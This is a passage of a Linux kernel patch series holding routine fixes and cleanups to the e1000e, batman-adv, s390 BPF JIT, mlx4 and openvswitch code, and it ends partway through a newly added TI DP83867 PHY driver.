a/drivers/net/ethernet/intel/e1000e/param.c b/drivers/net/ethernet/intel/e1000e/param.c index aa1923f7ebdd..6d8c39abee16 100644 --- a/drivers/net/ethernet/intel/e1000e/param.c +++ b/drivers/net/ethernet/intel/e1000e/param.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/phy.c b/drivers/net/ethernet/intel/e1000e/phy.c index b2005e13fb01..de13aeacae97 100644 --- a/drivers/net/ethernet/intel/e1000e/phy.c +++ b/drivers/net/ethernet/intel/e1000e/phy.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/phy.h b/drivers/net/ethernet/intel/e1000e/phy.h index 537d2780b408..55bfe473514d 100644 --- a/drivers/net/ethernet/intel/e1000e/phy.h +++ b/drivers/net/ethernet/intel/e1000e/phy.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. 
* * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/ptp.c b/drivers/net/ethernet/intel/e1000e/ptp.c index 8d7b21dc7e19..25a0ad5102d6 100644 --- a/drivers/net/ethernet/intel/e1000e/ptp.c +++ b/drivers/net/ethernet/intel/e1000e/ptp.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/regs.h b/drivers/net/ethernet/intel/e1000e/regs.h index 110e27e35ff5..b24e5fee17f2 100644 --- a/drivers/net/ethernet/intel/e1000e/regs.h +++ b/drivers/net/ethernet/intel/e1000e/regs.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, From 21102626da60a6fcb0458e4040ee4739f04652e8 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:37 +0100 Subject: [PATCH 655/872] batman-adv: types, Fix comment on bcast_own batadv_orig_bat_iv->bcast_own is actually not a bitfield, it is an array. Adjust the comment accordingly. Signed-off-by: Markus Pargmann Signed-off-by: Antonio Quartulli Signed-off-by: Marek Lindner --- net/batman-adv/types.h | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/net/batman-adv/types.h b/net/batman-adv/types.h index e95db4273356..c1000c0d6b0d 100644 --- a/net/batman-adv/types.h +++ b/net/batman-adv/types.h @@ -183,9 +183,10 @@ struct batadv_orig_node_vlan { /** * struct batadv_orig_bat_iv - B.A.T.M.A.N. IV private orig_node members - * @bcast_own: bitfield containing the number of our OGMs this orig_node - * rebroadcasted "back" to us (relative to last_real_seqno) - * @bcast_own_sum: counted result of bcast_own + * @bcast_own: set of bitfields (one per hard interface) where each one counts + * the number of our OGMs this orig_node rebroadcasted "back" to us (relative + * to last_real_seqno). Every bitfield is BATADV_TQ_LOCAL_WINDOW_SIZE bits long. + * @bcast_own_sum: sum of bcast_own * @ogm_cnt_lock: lock protecting bcast_own, bcast_own_sum, * neigh_node->bat_iv.real_bits & neigh_node->bat_iv.real_packet_count */ From a0c77227ffd0ad371cfde84458f440bcde5ab048 Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Sun, 1 Mar 2015 16:56:26 +0100 Subject: [PATCH 656/872] batman-adv: Remove unnecessary check for orig_ifinfo not NULL orig_ifinfo is dereferenced multiple times in batadv_iv_ogm_update_seqnos before the check for NULL is done. The function also exists at the beginning when orig_ifinfo would have been NULL. This makes the check at the end unnecessary and only confuses the reader/code analyzers. 
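Reduced to a self-contained sketch (the names below are illustrative, not batman-adv code), the removed pattern looks like this:

    struct obj { int refcount; int field; };

    static int handle(struct obj *obj)
    {
            int ret;

            if (!obj)
                    return 0;       /* early exit: obj is never NULL below */

            ret = obj->field;       /* unconditional dereference */

            if (obj)                /* dead check: obj cannot be NULL here */
                    obj->refcount--;
            return ret;
    }
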
Signed-off-by: Sven Eckelmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 9f83137a6514..4e93d2d3958b 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -1357,8 +1357,7 @@ batadv_iv_ogm_update_seqnos(const struct ethhdr *ethhdr, out: spin_unlock_bh(&orig_node->bat_iv.ogm_cnt_lock); batadv_orig_node_free_ref(orig_node); - if (orig_ifinfo) - batadv_orig_ifinfo_free_ref(orig_ifinfo); + batadv_orig_ifinfo_free_ref(orig_ifinfo); return ret; } From e8ad3b1acfbb022b495f12f4ed6e825d5f53546a Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:38 +0100 Subject: [PATCH 657/872] batman-adv: main, Convert is_my_mac() to bool It is much clearer to see a bool type as return value than 'int' for functions that are supposed to return true or false. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.c | 11 +++++++---- net/batman-adv/main.h | 2 +- 2 files changed, 8 insertions(+), 5 deletions(-) diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index fd9333dffc97..a22247a61d3e 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -209,10 +209,13 @@ void batadv_mesh_free(struct net_device *soft_iface) * interfaces in the current mesh * @bat_priv: the bat priv with all the soft interface information * @addr: the address to check + * + * Returns 'true' if the mac address was found, false otherwise. */ -int batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr) +bool batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr) { const struct batadv_hard_iface *hard_iface; + bool is_my_mac = false; rcu_read_lock(); list_for_each_entry_rcu(hard_iface, &batadv_hardif_list, list) { @@ -223,12 +226,12 @@ int batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr) continue; if (batadv_compare_eth(hard_iface->net_dev->dev_addr, addr)) { - rcu_read_unlock(); - return 1; + is_my_mac = true; + break; } } rcu_read_unlock(); - return 0; + return is_my_mac; } /** diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 026ba37f31a6..96876d29f952 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -195,7 +195,7 @@ extern struct workqueue_struct *batadv_event_workqueue; int batadv_mesh_init(struct net_device *soft_iface); void batadv_mesh_free(struct net_device *soft_iface); -int batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr); +bool batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr); struct batadv_hard_iface * batadv_seq_print_text_primary_if_get(struct seq_file *seq); int batadv_max_header_len(void); From f2d5cf2add74ac066572b5215ba8a33dfcf0b85c Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:39 +0100 Subject: [PATCH 658/872] batman-adv: main, batadv_compare_eth return bool Declare the returntype of batadv_compare_eth as bool. The function called inside this helper function (ether_addr_equal_unaligned) also uses bool as return value, so there is no need to return int. 
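The one-line hunk below is the whole change; for illustration, the helper and a caller (adapted from batadv_is_my_mac() above) then read as a plain predicate, with bool semantics end to end:

    static inline bool batadv_compare_eth(const void *data1, const void *data2)
    {
            return ether_addr_equal_unaligned(data1, data2);
    }

    if (batadv_compare_eth(hard_iface->net_dev->dev_addr, addr)) {
            is_my_mac = true;
            break;
    }
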
Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 96876d29f952..af0a3361d4b2 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -279,7 +279,7 @@ static inline void _batadv_dbg(int type __always_unused, * * note: can't use ether_addr_equal() as it requires aligned memory */ -static inline int batadv_compare_eth(const void *data1, const void *data2) +static inline bool batadv_compare_eth(const void *data1, const void *data2) { return ether_addr_equal_unaligned(data1, data2); } From 9fb6c6519b10aee4815591122ce59ce4b63fc44b Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:40 +0100 Subject: [PATCH 659/872] batman-adv: Remove unnecessary ret variable We can avoid this indirect return variable by directly returning the error values. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.c | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index a22247a61d3e..49f07e1e0f5f 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -513,14 +513,12 @@ static struct batadv_algo_ops *batadv_algo_get(char *name) int batadv_algo_register(struct batadv_algo_ops *bat_algo_ops) { struct batadv_algo_ops *bat_algo_ops_tmp; - int ret; bat_algo_ops_tmp = batadv_algo_get(bat_algo_ops->name); if (bat_algo_ops_tmp) { pr_info("Trying to register already registered routing algorithm: %s\n", bat_algo_ops->name); - ret = -EEXIST; - goto out; + return -EEXIST; } /* all algorithms must implement all ops (for now) */ @@ -534,16 +532,13 @@ int batadv_algo_register(struct batadv_algo_ops *bat_algo_ops) !bat_algo_ops->bat_neigh_is_equiv_or_better) { pr_info("Routing algo '%s' does not implement required ops\n", bat_algo_ops->name); - ret = -EINVAL; - goto out; + return -EINVAL; } INIT_HLIST_NODE(&bat_algo_ops->list); hlist_add_head(&bat_algo_ops->list, &batadv_algo_list); - ret = 0; -out: - return ret; + return 0; } int batadv_algo_select(struct batadv_priv *bat_priv, char *name) From f372d09059a67f57b3d2b5eab8c05b0ddb8ca92f Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:41 +0100 Subject: [PATCH 660/872] batman-adv: Remove unnecessary ret variable in algo_register Remove ret variable and all jumps. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.c | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index 49f07e1e0f5f..548e405d13c1 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -544,17 +544,14 @@ int batadv_algo_register(struct batadv_algo_ops *bat_algo_ops) int batadv_algo_select(struct batadv_priv *bat_priv, char *name) { struct batadv_algo_ops *bat_algo_ops; - int ret = -EINVAL; bat_algo_ops = batadv_algo_get(name); if (!bat_algo_ops) - goto out; + return -EINVAL; bat_priv->bat_algo_ops = bat_algo_ops; - ret = 0; -out: - return ret; + return 0; } int batadv_algo_seq_print_text(struct seq_file *seq, void *offset) From 226a07ef0a5a2dfad4cce1a5c226c4cb7370d41f Mon Sep 17 00:00:00 2001 From: Jan Kara Date: Wed, 3 Jun 2015 15:50:35 +0200 Subject: [PATCH 661/872] lib: Clarify the return value of strnlen_user() strnlen_user() can return a number in a range 0 to count + sizeof(unsigned long) - 1. 
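For illustration, a caller therefore has to compare the result against count rather than count+1 (a usage sketch, not code from the tree; the error codes chosen are arbitrary):

    long len = strnlen_user(ustr, count);

    if (len == 0)
            return -EFAULT;         /* fault or invalid count */
    if (len > count)
            return -E2BIG;          /* string (including NUL) does not fit */
    /* here: 0 < len <= count, and len includes the terminating NUL */
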
Clarify the comment at the top of the function so that users don't think the function returns at most count+1. Signed-off-by: Jan Kara [ Also added commentary about preferably not using this function ] Signed-off-by: Linus Torvalds --- lib/strnlen_user.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/lib/strnlen_user.c b/lib/strnlen_user.c index 11649615c505..fe9a32591c24 100644 --- a/lib/strnlen_user.c +++ b/lib/strnlen_user.c @@ -90,8 +90,15 @@ static inline long do_strnlen_user(const char __user *src, unsigned long count, * Get the size of a NUL-terminated string in user space. * * Returns the size of the string INCLUDING the terminating NUL. - * If the string is too long, returns 'count+1'. + * If the string is too long, returns a number larger than @count. User + * has to check the return value against "> count". * On exception (or invalid count), returns 0. + * + * NOTE! You should basically never use this function. There is + * almost never any valid case for using the length of a user space + * string, since the string can be changed at any time by other + * threads. Use "strncpy_from_user()" instead to get a stable copy + * of the string. */ long strnlen_user(const char __user *str, long count) { From 826f5de84ceb6f96306ce4081b75a0539d8edd00 Mon Sep 17 00:00:00 2001 From: Alexey Skidanov Date: Sun, 30 Nov 2014 15:03:51 +0200 Subject: [PATCH 662/872] drm/amdkfd: fix topology bug with capability attr. This patch fixes a bug where the number of watch points was shown before it was actually calculated Signed-off-by: Alexey Skidanov Cc: stable@vger.kernel.org Signed-off-by: Oded Gabbay --- drivers/gpu/drm/amd/amdkfd/kfd_topology.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c index e469c4b2e8cc..c25728bc388a 100644 --- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c +++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c @@ -684,8 +684,6 @@ static ssize_t node_show(struct kobject *kobj, struct attribute *attr, dev->node_props.cpu_core_id_base); sysfs_show_32bit_prop(buffer, "simd_id_base", dev->node_props.simd_id_base); - sysfs_show_32bit_prop(buffer, "capability", - dev->node_props.capability); sysfs_show_32bit_prop(buffer, "max_waves_per_simd", dev->node_props.max_waves_per_simd); sysfs_show_32bit_prop(buffer, "lds_size_in_kb", @@ -736,6 +734,8 @@ static ssize_t node_show(struct kobject *kobj, struct attribute *attr, dev->gpu->kfd2kgd->get_fw_version( dev->gpu->kgd, KGD_ENGINE_MEC1)); + sysfs_show_32bit_prop(buffer, "capability", + dev->node_props.capability); } return sysfs_show_32bit_prop(buffer, "max_engine_clk_ccompute", From 08602d74bad6cd6de6866ca6e1adf30c45139931 Mon Sep 17 00:00:00 2001 From: Stephen Hemminger Date: Wed, 3 Jun 2015 13:32:02 -0700 Subject: [PATCH 663/872] MAINTAINERS - remove OSDL reference OSDL has been gone for many years, looks like there still was one reference to it. Signed-off-by: Stephen Hemminger Signed-off-by: Linus Torvalds --- MAINTAINERS | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/MAINTAINERS b/MAINTAINERS index e30871880fdb..a5b8584da5bf 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -51,9 +51,9 @@ trivial patch so apply some common sense. or does something very odd once a month document it. PLEASE remember that submissions must be made under the terms - of the OSDL certificate of contribution and should include a - Signed-off-by: line. 
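Reduced to a generic sketch (show_prop() and encode_watch_points() are illustrative names, not the amdkfd code), the rule is to finish computing an attribute before formatting it into the sysfs buffer:

    /* wrong: capability is shown before the watch-point count is folded in */
    show_prop(buffer, "capability", props->capability);
    props->capability |= encode_watch_points(dev);

    /* right: compute first, show afterwards */
    props->capability |= encode_watch_points(dev);
    show_prop(buffer, "capability", props->capability);
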
The current version of this "Developer's - Certificate of Origin" (DCO) is listed in the file + of the Linux Foundation certificate of contribution and should + include a Signed-off-by: line. The current version of this + "Developer's Certificate of Origin" (DCO) is listed in the file Documentation/SubmittingPatches. 6. Make sure you have the right to send any changes you make. If you From bbac1c94880cb8c7e093718897f4822f3933dd3c Mon Sep 17 00:00:00 2001 From: Michael Holzheu Date: Mon, 1 Jun 2015 22:48:34 -0700 Subject: [PATCH 664/872] s390/bpf: fix stack allocation On s390x we have to provide 160 bytes stack space before we can call the next function. From the 160 bytes that we got from the previous function we only use 11 * 8 bytes and have 160 - 11 * 8 bytes left. Currently for BPF we allocate additional 160 - 11 * 8 bytes for the next function. This is wrong because then the next function only gets: (160 - 11 * 8) + (160 - 11 * 8) = 2 * 72 = 144 bytes Fix this and allocate enough memory for the next function. Fixes: 054623105728 ("s390/bpf: Add s390x eBPF JIT compiler backend") Signed-off-by: Michael Holzheu Acked-by: Heiko Carstens Signed-off-by: Alexei Starovoitov Signed-off-by: David S. Miller --- arch/s390/net/bpf_jit.h | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/arch/s390/net/bpf_jit.h b/arch/s390/net/bpf_jit.h index ba8593a515ba..de156ba3bd71 100644 --- a/arch/s390/net/bpf_jit.h +++ b/arch/s390/net/bpf_jit.h @@ -48,7 +48,9 @@ extern u8 sk_load_word[], sk_load_half[], sk_load_byte[]; * We get 160 bytes stack space from calling function, but only use * 11 * 8 byte (old backchain + r15 - r6) for storing registers. */ -#define STK_OFF (MAX_BPF_STACK + 8 + 4 + 4 + (160 - 11 * 8)) +#define STK_SPACE (MAX_BPF_STACK + 8 + 4 + 4 + 160) +#define STK_160_UNUSED (160 - 11 * 8) +#define STK_OFF (STK_SPACE - STK_160_UNUSED) #define STK_OFF_TMP 160 /* Offset of tmp buffer on stack */ #define STK_OFF_HLEN 168 /* Offset of SKB header length on stack */ From 88aeca15d637c279171ba441730ef41e4c4ce0ed Mon Sep 17 00:00:00 2001 From: Michael Holzheu Date: Mon, 1 Jun 2015 22:48:35 -0700 Subject: [PATCH 665/872] s390/bpf: fix bpf frame pointer setup Currently the bpf frame pointer is set to the old r15. This is wrong because of packed stack. Fix this and adjust the frame pointer to respect packed stack. This now generates a prolog like the following: 3ff8001c3fa: eb67f0480024 stmg %r6,%r7,72(%r15) 3ff8001c400: ebcff0780024 stmg %r12,%r15,120(%r15) 3ff8001c406: b904001f lgr %r1,%r15 <- load backchain 3ff8001c40a: 41d0f048 la %r13,72(%r15) <- load adjusted bfp 3ff8001c40e: a7fbfd98 aghi %r15,-616 3ff8001c412: e310f0980024 stg %r1,152(%r15) <- save backchain Fixes: 054623105728 ("s390/bpf: Add s390x eBPF JIT compiler backend") Signed-off-by: Michael Holzheu Acked-by: Heiko Carstens Signed-off-by: Alexei Starovoitov Signed-off-by: David S. 
Miller --- arch/s390/net/bpf_jit_comp.c | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c index 20c146d1251a..55423d8be580 100644 --- a/arch/s390/net/bpf_jit_comp.c +++ b/arch/s390/net/bpf_jit_comp.c @@ -384,13 +384,16 @@ static void bpf_jit_prologue(struct bpf_jit *jit) } /* Setup stack and backchain */ if (jit->seen & SEEN_STACK) { - /* lgr %bfp,%r15 (BPF frame pointer) */ - EMIT4(0xb9040000, BPF_REG_FP, REG_15); + if (jit->seen & SEEN_FUNC) + /* lgr %w1,%r15 (backchain) */ + EMIT4(0xb9040000, REG_W1, REG_15); + /* la %bfp,STK_160_UNUSED(%r15) (BPF frame pointer) */ + EMIT4_DISP(0x41000000, BPF_REG_FP, REG_15, STK_160_UNUSED); /* aghi %r15,-STK_OFF */ EMIT4_IMM(0xa70b0000, REG_15, -STK_OFF); if (jit->seen & SEEN_FUNC) - /* stg %bfp,152(%r15) (backchain) */ - EMIT6_DISP_LH(0xe3000000, 0x0024, BPF_REG_FP, REG_0, + /* stg %w1,152(%r15) (backchain) */ + EMIT6_DISP_LH(0xe3000000, 0x0024, REG_W1, REG_0, REG_15, 152); } /* From db9777e376b0e038fc01d1361c7ea3eaf801c718 Mon Sep 17 00:00:00 2001 From: Or Gerlitz Date: Tue, 2 Jun 2015 10:29:48 +0300 Subject: [PATCH 666/872] net/mlx4_core: Fix build failure introduced by the EQ pool changes When CONFIG_RFS_ACCEL or SMP aren't set, we fail to build, fix it. Also, avoid build warning as of unused function on that setup. Fixes: c66fa19c405a ('net/mlx4: Add EQ pool') Reported-by: Michael Ellerman Signed-off-by: Matan Barak Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/eq.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/mellanox/mlx4/eq.c b/drivers/net/ethernet/mellanox/mlx4/eq.c index 11168825a9fa..aae13adfb492 100644 --- a/drivers/net/ethernet/mellanox/mlx4/eq.c +++ b/drivers/net/ethernet/mellanox/mlx4/eq.c @@ -221,6 +221,7 @@ static void mlx4_slave_event(struct mlx4_dev *dev, int slave, slave_event(dev, slave, eqe); } +#if defined(CONFIG_SMP) static void mlx4_set_eq_affinity_hint(struct mlx4_priv *priv, int vec) { int hint_err; @@ -234,6 +235,7 @@ static void mlx4_set_eq_affinity_hint(struct mlx4_priv *priv, int vec) if (hint_err) mlx4_warn(dev, "irq_set_affinity_hint failed, err %d\n", hint_err); } +#endif int mlx4_gen_pkey_eqe(struct mlx4_dev *dev, int slave, u8 port) { @@ -1207,8 +1209,8 @@ int mlx4_init_eq_table(struct mlx4_dev *dev) MLX4_NUM_ASYNC_EQE + MLX4_NUM_SPARE_EQE, 0, &priv->eq_table.eq[MLX4_EQ_ASYNC]); } else { -#ifdef CONFIG_RFS_ACCEL struct mlx4_eq *eq = &priv->eq_table.eq[i]; +#ifdef CONFIG_RFS_ACCEL int port = find_first_bit(eq->actv_ports.ports, dev->caps.num_ports) + 1; From f6b59f36b463ffdd82fc804f2772194eb8abd030 Mon Sep 17 00:00:00 2001 From: Antonio Murdaca Date: Tue, 2 Jun 2015 14:35:52 +0200 Subject: [PATCH 667/872] ethernet: micrel: use time_after_eq use the time_after_eq macro for jiffies comparison operation Signed-off-by: Antonio Murdaca Signed-off-by: David S. 
Miller --- drivers/net/ethernet/micrel/ksz884x.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/micrel/ksz884x.c b/drivers/net/ethernet/micrel/ksz884x.c index 6f332ebdf3b5..48d2aecb0da9 100644 --- a/drivers/net/ethernet/micrel/ksz884x.c +++ b/drivers/net/ethernet/micrel/ksz884x.c @@ -6664,7 +6664,7 @@ static void mib_read_work(struct work_struct *work) wake_up_interruptible( &hw_priv->counter[i].counter); } - } else if (jiffies >= hw_priv->counter[i].time) { + } else if (time_after_eq(jiffies, hw_priv->counter[i].time)) { /* Only read MIB counters when the port is connected. */ if (media_connected == mib->state) hw_priv->counter[i].read = 1; From 640b2b107cec23c754214b62a811465fa8f9257f Mon Sep 17 00:00:00 2001 From: Jiri Benc Date: Tue, 2 Jun 2015 14:36:34 +0200 Subject: [PATCH 668/872] openvswitch: disable LRO Currently, openvswitch tries to disable LRO from the user space. This does not work correctly when the device added is a vlan interface, though. Instead of dealing with possibly complex stacked cross name space relations in the user space, do the same as bridging does and call dev_disable_lro in the kernel. Signed-off-by: Jiri Benc Acked-by: Flavio Leitner Acked-by: Pravin B Shelar Signed-off-by: David S. Miller --- net/openvswitch/vport-netdev.c | 1 + 1 file changed, 1 insertion(+) diff --git a/net/openvswitch/vport-netdev.c b/net/openvswitch/vport-netdev.c index 4776282c6417..33e6d6e2908f 100644 --- a/net/openvswitch/vport-netdev.c +++ b/net/openvswitch/vport-netdev.c @@ -125,6 +125,7 @@ static struct vport *netdev_create(const struct vport_parms *parms) if (err) goto error_master_upper_dev_unlink; + dev_disable_lro(netdev_vport->dev); dev_set_promiscuity(netdev_vport->dev, 1); netdev_vport->dev->priv_flags |= IFF_OVS_DATAPATH; rtnl_unlock(); From 2a10154abcb75ad0d7b6bfea6210ac743ec60897 Mon Sep 17 00:00:00 2001 From: Dan Murphy Date: Tue, 2 Jun 2015 09:34:37 -0500 Subject: [PATCH 669/872] net: phy: dp83867: Add TI dp83867 phy Add support for the TI dp83867 Gigabit ethernet phy device. The DP83867 is a robust, low power, fully featured Physical Layer transceiver with integrated PMD sublayers to support 10BASE-T, 100BASE-TX and 1000BASE-T Ethernet protocols. Signed-off-by: Dan Murphy Signed-off-by: David S. 
Miller --- .../devicetree/bindings/net/ti,dp83867.txt | 19 ++ drivers/net/phy/Kconfig | 6 +- drivers/net/phy/Makefile | 1 + drivers/net/phy/dp83867.c | 239 ++++++++++++++++++ include/dt-bindings/net/ti-dp83867.h | 45 ++++ 5 files changed, 309 insertions(+), 1 deletion(-) create mode 100644 Documentation/devicetree/bindings/net/ti,dp83867.txt create mode 100644 drivers/net/phy/dp83867.c create mode 100644 include/dt-bindings/net/ti-dp83867.h diff --git a/Documentation/devicetree/bindings/net/ti,dp83867.txt b/Documentation/devicetree/bindings/net/ti,dp83867.txt new file mode 100644 index 000000000000..46bb67a222ea --- /dev/null +++ b/Documentation/devicetree/bindings/net/ti,dp83867.txt @@ -0,0 +1,19 @@ +* Texas Instruments - dp83867 Giga bit ethernet phy + +Required properties: + - reg - The ID number for the phy, usually a small integer + - ti,rx_int_delay - RGMII Recieve Clock Delay - see dt-bindings/net/ti-dp83867.h + for applicable values + - ti,tx_int_delay - RGMII Transmit Clock Delay - see dt-bindings/net/ti-dp83867.h + for applicable values + - ti,fifo_depth - Transmitt FIFO depth- see dt-bindings/net/ti-dp83867.h + for applicable values + +Example: + + ethernet-phy@0 { + reg = <0>; + ti,rx_int_delay = ; + ti,tx_int_delay = ; + ti,fifo_depth = ; + }; diff --git a/drivers/net/phy/Kconfig b/drivers/net/phy/Kconfig index 7c0cb87d1f2f..cf18940f4e84 100644 --- a/drivers/net/phy/Kconfig +++ b/drivers/net/phy/Kconfig @@ -112,6 +112,11 @@ config MICREL_PHY ---help--- Supports the KSZ9021, VSC8201, KS8001 PHYs. +config DP83867_PHY + tristate "Drivers for Texas Instruments DP83867 Gigabit PHY" + ---help--- + Currently supports the DP83867 PHY. + config FIXED_PHY tristate "Driver for MDIO Bus/PHY emulation with fixed speed/link PHYs" depends on PHYLIB @@ -205,7 +210,6 @@ config MDIO_BCM_UNIMAC This hardware can be found in the Broadcom GENET Ethernet MAC controllers as well as some Broadcom Ethernet switches such as the Starfighter 2 switches. - endif # PHYLIB config MICREL_KS8995MA diff --git a/drivers/net/phy/Makefile b/drivers/net/phy/Makefile index e97e7f921862..fcc25a0c45cd 100644 --- a/drivers/net/phy/Makefile +++ b/drivers/net/phy/Makefile @@ -22,6 +22,7 @@ obj-$(CONFIG_MDIO_BITBANG) += mdio-bitbang.o obj-$(CONFIG_MDIO_GPIO) += mdio-gpio.o obj-$(CONFIG_NATIONAL_PHY) += national.o obj-$(CONFIG_DP83640_PHY) += dp83640.o +obj-$(CONFIG_DP83867_PHY) += dp83867.o obj-$(CONFIG_STE10XP) += ste10Xp.o obj-$(CONFIG_MICREL_PHY) += micrel.o obj-$(CONFIG_MDIO_OCTEON) += mdio-octeon.o diff --git a/drivers/net/phy/dp83867.c b/drivers/net/phy/dp83867.c new file mode 100644 index 000000000000..ef0b4eb15f8d --- /dev/null +++ b/drivers/net/phy/dp83867.c @@ -0,0 +1,239 @@ +/* + * Driver for the Texas Instruments DP83867 PHY + * + * Copyright (C) 2015 Texas Instruments Inc. + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#include +#include +#include +#include +#include +#include + +#include + +#define DP83867_PHY_ID 0x2000a231 +#define DP83867_DEVADDR 0x1f + +#define MII_DP83867_PHYCTRL 0x10 +#define MII_DP83867_MICR 0x12 +#define MII_DP83867_ISR 0x13 +#define DP83867_CTRL 0x1f + +/* Extended Registers */ +#define DP83867_RGMIICTL 0x0032 +#define DP83867_RGMIIDCTL 0x0086 + +#define DP83867_SW_RESET BIT(15) +#define DP83867_SW_RESTART BIT(14) + +/* MICR Interrupt bits */ +#define MII_DP83867_MICR_AN_ERR_INT_EN BIT(15) +#define MII_DP83867_MICR_SPEED_CHNG_INT_EN BIT(14) +#define MII_DP83867_MICR_DUP_MODE_CHNG_INT_EN BIT(13) +#define MII_DP83867_MICR_PAGE_RXD_INT_EN BIT(12) +#define MII_DP83867_MICR_AUTONEG_COMP_INT_EN BIT(11) +#define MII_DP83867_MICR_LINK_STS_CHNG_INT_EN BIT(10) +#define MII_DP83867_MICR_FALSE_CARRIER_INT_EN BIT(8) +#define MII_DP83867_MICR_SLEEP_MODE_CHNG_INT_EN BIT(4) +#define MII_DP83867_MICR_WOL_INT_EN BIT(3) +#define MII_DP83867_MICR_XGMII_ERR_INT_EN BIT(2) +#define MII_DP83867_MICR_POL_CHNG_INT_EN BIT(1) +#define MII_DP83867_MICR_JABBER_INT_EN BIT(0) + +/* RGMIICTL bits */ +#define DP83867_RGMII_TX_CLK_DELAY_EN BIT(1) +#define DP83867_RGMII_RX_CLK_DELAY_EN BIT(0) + +/* PHY CTRL bits */ +#define DP83867_PHYCR_FIFO_DEPTH_SHIFT 14 + +/* RGMIIDCTL bits */ +#define DP83867_RGMII_TX_CLK_DELAY_SHIFT 4 + +struct dp83867_private { + int rx_id_delay; + int tx_id_delay; + int fifo_depth; +}; + +static int dp83867_ack_interrupt(struct phy_device *phydev) +{ + int err = phy_read(phydev, MII_DP83867_ISR); + + if (err < 0) + return err; + + return 0; +} + +static int dp83867_config_intr(struct phy_device *phydev) +{ + int micr_status; + + if (phydev->interrupts == PHY_INTERRUPT_ENABLED) { + micr_status = 